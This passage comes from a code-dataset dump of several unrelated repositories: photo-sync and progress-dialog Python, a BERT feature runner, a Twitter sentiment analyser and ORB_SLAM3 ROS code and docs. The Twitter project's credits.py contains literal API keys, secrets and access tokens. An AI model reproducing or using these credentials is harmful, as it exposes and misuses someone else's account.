self._yaphoto.images[-1]\r\n return int(last_img.size) if last_img.size else None\r\n\r\n def get_create_time(self):\r\n return self._ctime\r\n\r\n def get_capture_time(self):\r\n return self._yaphoto.created\r\n\r\n def wximage(self, w, h):\r\n data = self._get_data(w, h)\r\n return 
wx.ImageFromStream(StringIO.StringIO(data))\r\n\r\n def nearest(self, w, h, orig=False):\r\n \"\"\"\r\n Возвращает версию фотографии не менее, чем прямоугольник w, h\r\n @rtype : yafotki.YandexImage\r\n \"\"\"\r\n if not orig:\r\n images = [i for i in self._yaphoto.images if i.name != u'orig']\r\n else:\r\n images = self._yaphoto.images\r\n if not images:\r\n raise ValueError('There is no images')\r\n try:\r\n return next((i for i in images if i.w >= w or i.h >= h))\r\n except StopIteration:\r\n return images[-1]\r\n\r\n def delete(self):\r\n self._yaphoto.delete()\r\n\r\n\r\nclass LocalPhoto(BasePhoto):\r\n def __init__(self, local_path):\r\n BasePhoto.__init__(self)\r\n if not os.path.exists(local_path):\r\n raise PhotoError('File \"{}\" not found'.format(local_path))\r\n self._path = local_path\r\n self._title = os.path.split(self._path)[1]\r\n self._mtime = datetime.datetime.fromtimestamp(os.path.getmtime(self._path))\r\n self._cache = self._load_cache(sid=self._path, remote=False, mtime=self._mtime)\r\n\r\n def _get_img_hash(self):\r\n return imghash.ImageHash.from_file(self._path)\r\n\r\n def get_path(self):\r\n return self._path\r\n\r\n def get_size(self):\r\n return os.path.getsize(self._path)\r\n\r\n def get_edited_time(self):\r\n return self._mtime\r\n\r\n def get_capture_time(self):\r\n return None\r\n\r\n def wximage(self, w, h):\r\n return utils.resize(wx.Image(self._path), w, h)\r\n\r\n\r\nclass MatchedPhoto(object):\r\n def __init__(self, remote=None, local=None):\r\n if not remote and not local:\r\n raise PhotoError('Empty photo')\r\n self.__remote = remote and RemotePhoto(remote)\r\n self.__local = local and LocalPhoto(local)\r\n\r\n def is_local(self, strict=False):\r\n return bool(self.__local and (not self.__remote if strict else True))\r\n\r\n def is_remote(self, strict=False):\r\n return bool(self.__remote and (not self.__local if strict else True))\r\n\r\n def is_matched(self):\r\n return bool(self.__remote and self.__local)\r\n\r\n def is_edited(self):\r\n return self.is_matched() and self.local.get_edited_time() > self.remote.get_create_time()\r\n\r\n @property\r\n def remote(self):\r\n return self.__remote\r\n\r\n @property\r\n def local(self):\r\n return self.__local\r\n\r\n @property\r\n def data(self):\r\n return self.__remote or self.__local\r\n\r\n @property\r\n def id(self):\r\n return self.__remote and self.__remote.get_id()\r\n\r\n @property\r\n def title(self):\r\n return self.data.get_title()\r\n\r\n @property\r\n def hash(self):\r\n return self.data.get_hash()\r\n\r\n @property\r\n def ratio(self):\r\n return self.data.get_ratio()\r\n\r\n @property\r\n def size(self):\r\n return self.data.get_size()\r\n\r\n def get_capture_time(self):\r\n return self.data.get_capture_time()\r\n\r\n def assign_local(self, other):\r\n assert isinstance(other, MatchedPhoto), type(other)\r\n self.__local = other.local\r\n\r\n def similar_to(self, other):\r\n return self.hash.similar_to(other.hash)\r\n\r\n def wximage(self, w, h):\r\n return self.data.wximage(w, h)\r\n\r\n def delete(self):\r\n if self.__remote:\r\n self.__remote.delete()\r\n"
},
{
"alpha_fraction": 0.5263291597366333,
"alphanum_fraction": 0.5326888561248779,
"avg_line_length": 29.717741012573242,
"blob_id": "a71d1f367c9c739a319fdfeec6797f66e6a3d72a",
"content_id": "178b0d175922e239496ad3a5d8c788b64a181ba2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3961,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 124,
"path": "/lib/controllers/progressctr.py",
"repo_name": "anwinged/phoebe",
"src_encoding": "UTF-8",
"text": "#! coding: utf-8\r\n\r\n__author__ = 'Anton Vakhrushev'\r\n\r\nimport wx\r\n\r\n\r\nclass ProgressError(Exception):\r\n pass\r\n\r\n\r\nclass ProgressStopIteration(ProgressError):\r\n pass\r\n\r\n\r\nclass ProgressSkipIteration(ProgressError):\r\n pass\r\n\r\n\r\nclass Progress(object):\r\n\r\n @staticmethod\r\n def cover(progress, *args, **kwargs):\r\n if progress:\r\n return progress\r\n return Progress(*args, **kwargs)\r\n\r\n def __init__(self, parent=None):\r\n self.dlg = wx.GenericProgressDialog(u'Внимание', u'Идет процесс...', 100, parent,\r\n wx.PD_APP_MODAL | wx.PD_CAN_ABORT | wx.PD_CAN_SKIP)\r\n self.dlg.SetSize((450, -1))\r\n self.dlg.Refresh()\r\n self.func = None\r\n self.iterable = None\r\n self.maximum = None\r\n self.message = None\r\n self.step = 0\r\n self.current = 0\r\n self.owner_count = 0\r\n\r\n def init(self, func, iterable=None, maximum=None, title=None, message=None):\r\n # check function\r\n if not callable(func):\r\n raise ProgressError(u'`func` must be callable')\r\n self.func = func\r\n # check count\r\n if maximum is None:\r\n try:\r\n self.maximum = len(iterable)\r\n except TypeError:\r\n self.maximum = None\r\n # check iterable\r\n self.iterable = iterable\r\n if self.iterable is None:\r\n self.maximum = None\r\n # check title\r\n if message is None:\r\n self.message = lambda index, item: unicode(item)\r\n elif isinstance(message, basestring):\r\n self.message = lambda index, item: unicode(message)\r\n elif callable(message):\r\n self.message = lambda index, item: unicode(message(index, item))\r\n else:\r\n raise ProgressError(u'{} is not appropriate type for `message`'.format(type(message)))\r\n self.current = 0\r\n self.step += 1\r\n self.dlg.SetTitle(u'[Шаг {}] {}'.format(self.step, title or u'Внимание'))\r\n self.dlg.Resume()\r\n\r\n def run(self):\r\n try:\r\n self.dlg.SetRange(self.maximum or 100)\r\n if self.iterable is not None:\r\n for item in self.iterable:\r\n self.update(self.message(self.current, item))\r\n yield self.func(item)\r\n self.current += 1\r\n else:\r\n self.update(self.message(self.current, None))\r\n yield self.func()\r\n self.current += 1\r\n except ProgressSkipIteration:\r\n return\r\n\r\n def update(self, text):\r\n if len(text) > 50:\r\n text = u'...' + text[-50:]\r\n if self.maximum is None:\r\n text = u'[{}] {}'.format(self.current, text)\r\n self.dlg.Pulse(text)\r\n else:\r\n text = u'[{:.2%}] {}'.format(float(self.current) / self.maximum, text)\r\n self.dlg.Update(self.current, text)\r\n if self.dlg.WasCancelled():\r\n print 'stopped'\r\n raise ProgressStopIteration()\r\n if self.dlg.WasSkipped():\r\n print 'skipped'\r\n raise ProgressSkipIteration()\r\n\r\n def map(self, func, iterable, count=None, title=None, message=None):\r\n self.init(func, iterable, count, title, message)\r\n for item in self.run():\r\n yield item\r\n\r\n def wrap(self, iterable, count=None, title=None, message=None):\r\n self.init(lambda x: x, iterable, count, title, message)\r\n for item in self.run():\r\n yield item\r\n\r\n def do(self, func, title=None):\r\n self.init(func, None, None, title, title)\r\n return next(self.run())\r\n\r\n def close(self):\r\n self.dlg.Destroy()\r\n\r\n def __enter__(self):\r\n self.owner_count += 1\r\n\r\n def __exit__(self, exc_type, exc_val, exc_tb):\r\n self.owner_count -= 1\r\n if not self.owner_count:\r\n self.close()"
},
{
"alpha_fraction": 0.5297074913978577,
"alphanum_fraction": 0.5420475602149963,
"avg_line_length": 31.18181800842285,
"blob_id": "7d331993415655f3a67cb8955443c219cbeb5135",
"content_id": "a8270c0d294a52ce9b4f23f006e10bd06a517bbd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2208,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 66,
"path": "/lib/models/imghash.py",
"repo_name": "anwinged/phoebe",
"src_encoding": "UTF-8",
"text": "#! python\r\n#! -*- coding: utf-8 -*-\r\n\r\n__author__ = 'anton'\r\n\r\nimport subprocess\r\nimport re\r\nimport itertools\r\n\r\n\r\nclass ImageHash(object):\r\n\r\n PATTERN = r'^\\s*PH[1-7]:\\s*([\\d\\.\\+\\-]+),\\s*([\\d\\.\\+\\-]+)\\s*$'\r\n LENGTH = 42\r\n\r\n def __init__(self, values=None):\r\n self.__values = []\r\n if values is not None:\r\n self.__values = list(values)\r\n assert len(self.__values) == ImageHash.LENGTH, 'Get {}'.format(len(self.__values))\r\n\r\n @property\r\n def values(self):\r\n return self.__values\r\n\r\n def similar_to(self, other):\r\n if self and other:\r\n return sum(map(lambda x, y: (x-y)*(x-y), self.values, other.values))\r\n return float(1 << 32)\r\n\r\n def __nonzero__(self):\r\n return bool(self.__values)\r\n\r\n def __str__(self):\r\n if not self.__values:\r\n return '<Empty>'\r\n return str(self.__values)\r\n\r\n def __eq__(self, other):\r\n return self.similar_to(other)\r\n\r\n @classmethod\r\n def from_file(cls, filename):\r\n text = subprocess.check_output(['identify', '-verbose', '-moments', filename.encode('cp1251')])\r\n pairs = re.findall(cls.PATTERN, text, re.MULTILINE)\r\n return cls([float(i) for i in itertools.chain.from_iterable(pairs)])\r\n\r\n @classmethod\r\n def from_stream(cls, data):\r\n p = subprocess.Popen(['identify', '-verbose', '-moments', '-'],\r\n stdout=subprocess.PIPE,\r\n stdin=subprocess.PIPE,\r\n stderr=subprocess.STDOUT,\r\n shell=True)\r\n text = p.communicate(input=data)[0]\r\n pairs = re.findall(cls.PATTERN, text, re.MULTILINE)\r\n return cls([float(i) for i in itertools.chain.from_iterable(pairs)])\r\n\r\n\r\nif __name__ == '__main__':\r\n data = open(u'D:\\\\Temp\\\\Тоха и Анька\\\\0_ac38b_a4e826_XS.jpg', 'rb').read()\r\n data_hash = ImageHash.from_stream(data)\r\n file_hash = ImageHash.from_file(u'D:\\\\Temp\\\\Тоха и Анька\\\\0_ac38b_a4e826_XS.jpg')\r\n print 'DATA', data_hash, 'LEN', len(data_hash.values)\r\n print 'FILE', file_hash, 'LEN', len(file_hash.values)\r\n print 'DIFF', data_hash == file_hash"
}
] | 15 |
NathanDuran/BERT | https://github.com/NathanDuran/BERT | 7dfc12e150c6fe73de9636f1b72cca41a1273d62 | 1db39a253ab98dc118eac7f23fdf4d506b580d58 | e9c59640474c8db01933d07db21e9ba54ae26b0f | refs/heads/master | 2020-04-06T21:15:49.828123 | 2019-11-20T00:17:52 | 2019-11-20T00:17:52 | 157,798,165 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.4763385057449341,
"alphanum_fraction": 0.4818652868270874,
"avg_line_length": 33.46428680419922,
"blob_id": "ecb52a1a6d4499210716ac4893871d275e21d2d4",
"content_id": "a9e891d0dda59dc5b60cee02db0004b5c50791e5",
"detected_licenses": [
"Apache-2.0",
"LicenseRef-scancode-public-domain"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2895,
"license_type": "permissive",
"max_line_length": 115,
"num_lines": 84,
"path": "/BERT_run_extract_features.py",
"repo_name": "NathanDuran/BERT",
"src_encoding": "UTF-8",
"text": "import getopt\nimport os\nimport sys\nimport subprocess\n\n\ndef main(argv):\n list_flag = False\n set_name = ''\n\n # Read command line args\n try:\n opts, args = getopt.getopt(argv, \"ls:\", [\"set_name=\"])\n except getopt.GetoptError:\n print(\"test.py -i <set_name>\")\n sys.exit(2)\n for opt, arg in opts:\n if opt == '-l':\n list_flag = True\n if opt in (\"-s\", \"--set_name\"):\n set_name = arg\n\n # BERT args\n input_dir = \"swda_data/\"\n output_dir = \"swda_output/BERT_Features/\"\n\n vocab_file = \"BERT_Base/vocab.txt\"\n bert_config_file = \"BERT_Base/bert_config.json\"\n init_checkpoint = \"swda_output/BERT_Base/train/model.ckpt-18038\"\n layers = -1\n max_seq_length = 128\n batch_size = 8\n\n # If running on a list of files\n if list_flag:\n\n # Open file list\n with open(input_dir + set_name + \"_split.txt\") as file_list:\n\n # Set input and create output directories\n input_dir += set_name + \"_utt/\"\n\n output_dir += set_name + \"/\"\n if not os.path.exists(output_dir):\n os.makedirs(output_dir, mode=0o777)\n\n # Run BERT for each file\n for line in file_list:\n\n input_file = input_dir + line.rstrip() + \"_utt.txt\"\n output_file = output_dir + line.rstrip() + \"_encodings.jsonl\"\n\n command_line_args = \"--input_file=\" + input_file + \" \" + \\\n \"--output_file=\" + output_file + \" \" + \\\n \"--vocab_file=\" + vocab_file + \" \" \\\n \"--bert_config_file=\" + bert_config_file + \" \" \\\n \"--init_checkpoint=\" + init_checkpoint + \" \" \\\n \"--layers=\" + str(layers) + \" \" \\\n \"--max_seq_length=\" + str(max_seq_length) + \" \" \\\n \"--batch_size=\" + str(batch_size)\n\n process = subprocess.check_call(\"nice python extract_features.py \" + command_line_args, shell=True)\n \n del process\n\n # Else just run on the full set\n else:\n input_file = input_dir + set_name + \"_set_utt.txt\"\n output_file = output_dir + set_name + \"_set_encodings.jsonl\"\n\n command_line_args = \"--input_file=\" + input_file + \" \" + \\\n \"--output_file=\" + output_file + \" \" + \\\n \"--vocab_file=\" + vocab_file + \" \" \\\n \"--bert_config_file=\" + bert_config_file + \" \" \\\n \"--init_checkpoint=\" + init_checkpoint + \" \" \\\n \"--layers=\" + str(layers) + \" \" \\\n \"--max_seq_length=\" + str(max_seq_length) + \" \" \\\n \"--batch_size=\" + str(batch_size)\n\n os.system(\"python extract_features.py \" + command_line_args)\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n"
}
] | 1 |
karthikvg/Twitter_Sentiment_Analysis | https://github.com/karthikvg/Twitter_Sentiment_Analysis | c64d25dce1be1d2a4408c531c0dc8c9d95ce7c91 | 31805490dcda5fa350b802c6290b4579c5f76293 | 279071d6e71c5d8e72770c5fb5732e197a59b9ff | refs/heads/master | 2020-04-17T07:21:25.756242 | 2019-01-18T07:52:11 | 2019-01-18T07:52:11 | 166,365,814 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.568561851978302,
"alphanum_fraction": 0.5852842926979065,
"avg_line_length": 22.076923370361328,
"blob_id": "b3c0b4fddaac1ed4e48ace8f3c9db7d7472102a0",
"content_id": "a2002eaf745f0132ade856dac401fd403637fef4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 299,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 13,
"path": "/helpers.py",
"repo_name": "karthikvg/Twitter_Sentiment_Analysis",
"src_encoding": "UTF-8",
"text": "def get_message(temp):\n\n start = temp.find(\"text\")+8\n temp1 = temp[start:]\n end = temp1.find(\",\")\n return temp[start:start+end-1]\n\n\ndef write_to_a_file(filename, data):\n\n with open(filename,\"w\", encoding='utf-8') as writer:\n for x in data:\n writer.write(str(x)+'\\n')"
},
{
"alpha_fraction": 0.6741573214530945,
"alphanum_fraction": 0.6741573214530945,
"avg_line_length": 21,
"blob_id": "cf3d0c270e2590843cb4008333666d8ecb04a039",
"content_id": "6f9ab654fbc6a25e2ec63e19f98cdd345dd8b551",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 89,
"license_type": "no_license",
"max_line_length": 23,
"num_lines": 4,
"path": "/credits.py",
"repo_name": "karthikvg/Twitter_Sentiment_Analysis",
"src_encoding": "UTF-8",
"text": "CONSUMER_KEY=\"1k92yCTO1Ihj0R5FujNNJmUbS\"\nCONSUMER_SECRET=\"hZtKpRq547ZifpRE56IWzsclsiYtF9QTHy8UkCtAG89kx5rvfT\"\nACCESS_TOKEN=\"1039355503044845569-kmHjNNPvoeN6n5IszPLTRZa9zmuvSV\"\nACCESS_SECRET=\"2wV2K6R7zgMM4QS30Pj4QhPZrkkVZXAsD0e457WO9e4D6\"\n\n"
},
{
"alpha_fraction": 0.6440913677215576,
"alphanum_fraction": 0.650446891784668,
"avg_line_length": 36.296295166015625,
"blob_id": "fbbe093fd42a5634d62153f7ad1a34d99a4f9f7a",
"content_id": "8e9cbb95f325a2a43696b446ebe278b597dcda3d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5035,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 135,
"path": "/stream_tweets.py",
"repo_name": "karthikvg/Twitter_Sentiment_Analysis",
"src_encoding": "UTF-8",
"text": "from tweepy import API\nfrom tweepy import Cursor\nfrom tweepy.streaming import StreamListener\nfrom tweepy import Stream\nfrom tweepy import OAuthHandler\nfrom textblob import TextBlob\n\nimport re\nimport numpy as np\nimport pandas as pd\nimport credits\nimport matplotlib.pyplot as plt\nimport helpers\n\n\nclass TwitterClient:\n def __init__(self, user=None): # Authenticates the user\n self.auth = TwitterAuthenticator().authenticate()\n self.twitter_client = API(self.auth, wait_on_rate_limit=True)\n self.user = user\n\n def get_timeline_tweets(self, count): # Generates the timeline tweets for a given user id\n tweets = list()\n for tweet in Cursor(self.twitter_client.user_timeline, id=self.user).items(count):\n tweets.append(tweet)\n return tweets\n\n def get_friends(self, count): # Returns all the friends for a given user id\n friends = list()\n for friend in Cursor(self.twitter_client.friends, id=self.user).items(count):\n friends.append(friend)\n return friends\n\n def get_twitter_client_api(self): # Return the the twitter_client_api of the authenticated user\n return self.twitter_client\n\n\n# TwitterListener is used to get the data and also to handle the errors\nclass TwitterListener(StreamListener):\n\n def __init__(self, filename):\n self.filename = filename\n\n def on_data(self, data):\n with open(self.filename, 'a')as writing:\n writing.write(data)\n return True\n\n def on_error(self, status):\n if status == 420:\n print(status)\n return False\n print(status)\n\n\n# TwitterAuthenticator is used to authenticate the user with credentials listed in credits.py\nclass TwitterAuthenticator:\n\n def authenticate(self): # A method to authenticate the user\n auth = OAuthHandler(credits.CONSUMER_KEY, credits.CONSUMER_SECRET)\n auth.set_access_token(credits.ACCESS_TOKEN, credits.ACCESS_SECRET)\n return auth\n\n\nclass TwitterStreamer:\n\n def __init__(self):\n self.auth = TwitterAuthenticator()\n\n def stream_tweets(self, filename,\n hash_tag_list): # Used to stream tweets for the given hash_tag_list to given file name\n\n listener = TwitterListener(filename)\n auth = self.auth.authenticate()\n stream = Stream(auth, listener)\n stream.filter(track=hash_tag_list)\n\n\nclass TweetAnalyzer:\n\n def clean_tweet(self, tweet): # Used to clean the given tweet which makes use of regular expression library\n return ' '.join(re.sub(\"(@[A-Za-z0-9]+)|([^0-9A-Za-z \\t])|(\\w+:\\/\\/\\S+)\", \" \", tweet).split())\n\n def analyze_tweet_sentiment(self, tweet): # Returns 1,-1,0 for positive, negative, neutral sentiments respectively\n analyze = TextBlob(self.clean_tweet(tweet))\n if analyze.sentiment.polarity > 0:\n return 1\n elif analyze.sentiment.polarity < 0:\n return -1\n else:\n return 0\n\n def tweets_to_data_frame(self, tweets): # Returns a data_frame of a tweets with required fields\n dataFrame = pd.DataFrame(data=[tweet.text for tweet in tweets], columns=[\"tweets\"])\n dataFrame['Source'] = np.array([tweet.source for tweet in tweets])\n dataFrame['date'] = np.array([tweet.created_at for tweet in tweets])\n dataFrame['len'] = np.array([len(tweet.text) for tweet in tweets])\n dataFrame['likes'] = np.array([tweet.favorite_count for tweet in tweets])\n return dataFrame\n\n\nif __name__ == \"__main__\":\n user = TwitterClient()\n api = user.get_twitter_client_api()\n tweets = api.user_timeline(screen_name='MelissaBenoist', count=200)\n analyzer_temp = TweetAnalyzer()\n data_frame = analyzer_temp.tweets_to_data_frame(tweets)\n data_frame['Sentiment'] = 
np.array([analyzer_temp.analyze_tweet_sentiment(tweet) for tweet in data_frame['tweets']])\n print(data_frame)\n\n ################################\n # print(dir(tweets[0]))\n # print(data_frame.head(5))\n # print(data_frame['likes'])\n # print(dir(tweets[0]))\n # print(np.max(data_frame['likes']))\n # time_likes = pd.Series(data=data_frame['len'].values*100, index=data_frame['date'])\n # time_likes.plot(figsize=(16, 4), label='len', legend=True)\n # time_likes = pd.Series(data=data_frame['likes'].values, index=data_frame['date'])\n # time_likes.plot(figsize=(16, 4), label='likes', legend=True)\n # plt.show()\n\n ######################################\n # filename=\"karthik.json\"\n # hash_tag_list=[\"teradata\"]\n # tweets=user.get_timeline_tweets(0)\n # friends=user.get_friends(0)\n # print(\"the no of tweets for the given account id\",len(tweets),sep=\" \")\n # print(\"the no of friends for the given account id\",len(friends),sep=\" \")\n # for friend in friends:\n # print(friend)\n # helpers.write_to_a_file(\"tweets.json\",tweets)\n # helpers.write_to_a_file(\"friends.txt\",friends)\n # stream_tweets=TwitterStreamer()\n # stream_tweets.stream_tweets(filename,hash_tag_list)\n"
}
] | 3 |
National-Innovation-Center-Nepal/orb_slam_3_ros | https://github.com/National-Innovation-Center-Nepal/orb_slam_3_ros | 77e4dca204c4ce561d2a9a2d70734ff92a2f6c0f | e1dcb1c4b859f603f1c10c11c2ec76e1795d5bd0 | 980664f8134d17748c96f6acf481744bb0b67ba9 | refs/heads/main | 2023-03-16T20:36:37.586766 | 2021-03-15T07:05:36 | 2021-03-15T07:05:36 | 330,369,764 | 1 | 1 | null | 2021-01-17T10:57:34 | 2021-01-24T09:07:49 | 2021-01-24T09:49:30 | C++ | [
{
"alpha_fraction": 0.6601467132568359,
"alphanum_fraction": 0.6735941171646118,
"avg_line_length": 25.65217399597168,
"blob_id": "e214ad12904a11e3d0a9184bce64d26109e3218c",
"content_id": "e4664f75149f0b4b739e00e5b57e09665fb8b32d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2454,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 92,
"path": "/src/ros_mono.cc",
"repo_name": "National-Innovation-Center-Nepal/orb_slam_3_ros",
"src_encoding": "UTF-8",
"text": "/**\n* This file is part of ORB-SLAM3\n*\n* Copyright (C) 2017-2020 Carlos Campos, Richard Elvira, Juan J. Gómez Rodríguez, José M.M. Montiel and Juan D. Tardós, University of Zaragoza.\n* Copyright (C) 2014-2016 Raúl Mur-Artal, José M.M. Montiel and Juan D. Tardós, University of Zaragoza.\n*\n* ORB-SLAM3 is free software: you can redistribute it and/or modify it under the terms of the GNU General Public\n* License as published by the Free Software Foundation, either version 3 of the License, or\n* (at your option) any later version.\n*\n* ORB-SLAM3 is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even\n* the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n* GNU General Public License for more details.\n*\n* You should have received a copy of the GNU General Public License along with ORB-SLAM3.\n* If not, see <http://www.gnu.org/licenses/>.\n*/\n\n\n#include<iostream>\n#include<algorithm>\n#include<fstream>\n#include<chrono>\n\n#include<ros/ros.h>\n#include <cv_bridge/cv_bridge.h>\n\n#include<opencv2/core/core.hpp>\n\n#include <System.h>\n\nusing namespace std;\n\nclass ImageGrabber\n{\npublic:\n ImageGrabber(ORB_SLAM3::System* pSLAM):mpSLAM(pSLAM){}\n\n void GrabImage(const sensor_msgs::ImageConstPtr& msg);\n\n ORB_SLAM3::System* mpSLAM;\n};\n\nint main(int argc, char **argv)\n{\n ros::init(argc, argv, \"Mono\");\n ros::start();\n\n if(argc != 3)\n {\n cerr << endl << \"Usage: rosrun ORB_SLAM3 Mono path_to_vocabulary path_to_settings\" << endl; \n ros::shutdown();\n return 1;\n } \n\n // Create SLAM system. It initializes all system threads and gets ready to process frames.\n ORB_SLAM3::System SLAM(argv[1],argv[2],ORB_SLAM3::System::MONOCULAR,true);\n\n ImageGrabber igb(&SLAM);\n\n ros::NodeHandle nodeHandler;\n ros::Subscriber sub = nodeHandler.subscribe(\"/usb_cam/image_raw\", 1, &ImageGrabber::GrabImage,&igb);\n\n ros::spin();\n\n // Stop all threads\n SLAM.Shutdown();\n\n // Save camera trajectory\n SLAM.SaveKeyFrameTrajectoryTUM(\"KeyFrameTrajectory.txt\");\n\n ros::shutdown();\n\n return 0;\n}\n\nvoid ImageGrabber::GrabImage(const sensor_msgs::ImageConstPtr& msg)\n{\n // Copy the ros image message to cv::Mat.\n cv_bridge::CvImageConstPtr cv_ptr;\n try\n {\n cv_ptr = cv_bridge::toCvShare(msg);\n }\n catch (cv_bridge::Exception& e)\n {\n ROS_ERROR(\"cv_bridge exception: %s\", e.what());\n return;\n }\n\n mpSLAM->TrackMonocular(cv_ptr->image,cv_ptr->header.stamp.toSec());\n}\n\n\n"
},
{
"alpha_fraction": 0.4848484992980957,
"alphanum_fraction": 0.5454545617103577,
"avg_line_length": 23.75,
"blob_id": "617535053eafa72298b464aac2adea0bd6d44920",
"content_id": "a9bf2402700878ba1d019c61ee5d2285a15f69f2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 99,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 4,
"path": "/docs/search/all_1.js",
"repo_name": "National-Innovation-Center-Nepal/orb_slam_3_ros",
"src_encoding": "UTF-8",
"text": "var searchData=\n[\n ['orb_5fslam3_2',['ORB_SLAM3',['../namespace_o_r_b___s_l_a_m3.html',1,'']]]\n];\n"
},
{
"alpha_fraction": 0.52173912525177,
"alphanum_fraction": 0.573913037776947,
"avg_line_length": 27.75,
"blob_id": "c2946d1aacb72a03433cda7290548e87d560a058",
"content_id": "a757331b81d80e1d96337f5d32de210dfb0d5739",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 115,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 4,
"path": "/docs/search/all_3.js",
"repo_name": "National-Innovation-Center-Nepal/orb_slam_3_ros",
"src_encoding": "UTF-8",
"text": "var searchData=\n[\n ['viewerar_4',['ViewerAR',['../class_o_r_b___s_l_a_m3_1_1_viewer_a_r.html',1,'ORB_SLAM3']]]\n];\n"
},
{
"alpha_fraction": 0.5843373537063599,
"alphanum_fraction": 0.608433723449707,
"avg_line_length": 32.20000076293945,
"blob_id": "424aef1e4722d20343c4341f0919ff565b2d6d4a",
"content_id": "e9d0ee2345d9f552ff7e31146f2bb14dbc028572",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 166,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 5,
"path": "/docs/search/all_0.js",
"repo_name": "National-Innovation-Center-Nepal/orb_slam_3_ros",
"src_encoding": "UTF-8",
"text": "var searchData=\n[\n ['imagegrabber_0',['ImageGrabber',['../class_image_grabber.html',1,'']]],\n ['imugrabber_1',['ImuGrabber',['../class_imu_grabber.html',1,'']]]\n];\n"
},
{
"alpha_fraction": 0.49038460850715637,
"alphanum_fraction": 0.5480769276618958,
"avg_line_length": 25,
"blob_id": "15920947d986203818cfc4ab013d6caef81dcf3d",
"content_id": "c6e9e041ae697187d76f64493c6c6643e409a147",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 104,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 4,
"path": "/docs/search/classes_1.js",
"repo_name": "National-Innovation-Center-Nepal/orb_slam_3_ros",
"src_encoding": "UTF-8",
"text": "var searchData=\n[\n ['plane_7',['Plane',['../class_o_r_b___s_l_a_m3_1_1_plane.html',1,'ORB_SLAM3']]]\n];\n"
},
{
"alpha_fraction": 0.7265306115150452,
"alphanum_fraction": 0.7448979616165161,
"avg_line_length": 51.46428680419922,
"blob_id": "df776b264b3039d78a07dde285ebb93753a79b25",
"content_id": "c2b5c248a6bb9fe7eeded165142b2582131e71b5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1470,
"license_type": "no_license",
"max_line_length": 270,
"num_lines": 28,
"path": "/README.md",
"repo_name": "National-Innovation-Center-Nepal/orb_slam_3_ros",
"src_encoding": "UTF-8",
"text": "# orb_slam_3_ros \nDescription: \nThis repo contains both the standalong orb_slam3 module and ros wrapper for that orb_slam_3_ros. \n\nTo install this package: \n1. Clone this package \n2. build with catkin_make \n\n<h4> To run the mono slam: </h4> \nroslaunch orb_slam_3_ros mono_euroc.launch \nSubscribed topic: /usb_cam/image_raw (sensor_msgs/Image) \n\n<h4> To run the mono inertial slam: </h4> \nroslaunch orb_slam_3_ros mono_inertial_euroc.launch \n\nSubscribed topic: /usb_cam/image_raw (sensor_msgs/Image) \n /imu (sensor_msgs/Imu) \n \nAccording to the test on openvslam and orb_slam3 somehow orb_slam3 has showng bettern resutls when running visual slam processs.\n\nTodo:\n1. Integration of gridmap feature in this package such that when running slam 2d occupency grid map is generated in real time. Another package whih has tried smae thing which can be used and improved for better reliablility. https://github.com/skylook/ORB_SLAM2-gridmap \n2. SaveMap and LoadMap function implementation. https://github.com/UZ-SLAMLab/ORB_SLAM3/blob/master/include/System.h \n3. Fully ros compatible and removal of Pangolin viewer \n 3.1 pointcloud publisher \n 3.2 image publisher \n 3.3 dynamic reconfigurable parameters to change the orb_slam3 parameters in run time dynamically\n( Note: Adding ros data publisher like sensor_msgs/Image or sensor_msgs/PointCluod2 is not complecated. Binding them with real data peroperly is. \n"
},
{
"alpha_fraction": 0.7032085657119751,
"alphanum_fraction": 0.718716561794281,
"avg_line_length": 21.530120849609375,
"blob_id": "6e28f14ad90651d010e5fbe396b7b2f53bcd53d5",
"content_id": "47a4cd147c98f736c0619b6ee6034ad379677f6b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 3740,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 166,
"path": "/CMakeLists.txt",
"repo_name": "National-Innovation-Center-Nepal/orb_slam_3_ros",
"src_encoding": "UTF-8",
